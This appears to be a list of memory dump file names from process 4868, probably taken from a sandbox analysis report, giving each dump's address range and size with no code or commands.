memory/4868-36-0x0000000008370000-0x0000000008914000-memory.dmp  Filesize: 5.6MB
memory/4868-34-0x0000000007180000-0x0000000007216000-memory.dmp  Filesize: 600KB
memory/4868-38-0x0000000008920000-0x000000000CC4F000-memory.dmp  Filesize: 67.2MB
memory/4868-33-0x0000000006480000-0x000000000649A000-memory.dmp  Filesize: 104KB
memory/4868-32-0x0000000007740000-0x0000000007DBA000-memory.dmp  Filesize: 6.5MB
memory/4868-31-0x0000000005F10000-0x0000000005F5C000-memory.dmp  Filesize: 304KB
memory/4868-30-0x0000000005ED0000-0x0000000005EEE000-memory.dmp  Filesize: 120KB
memory/4868-29-0x0000000005A10000-0x0000000005D64000-memory.dmp  Filesize: 3.3MB
memory/4868-19-0x00000000058A0000-0x0000000005906000-memory.dmp  Filesize: 408KB
memory/4868-18-0x0000000005740000-0x00000000057A6000-memory.dmp  Filesize: 408KB
memory/4868-16-0x0000000004FA0000-0x00000000055C8000-memory.dmp  Filesize: 6.2MB
memory/4868-15-0x0000000004930000-0x0000000004966000-memory.dmp  Filesize: 216KB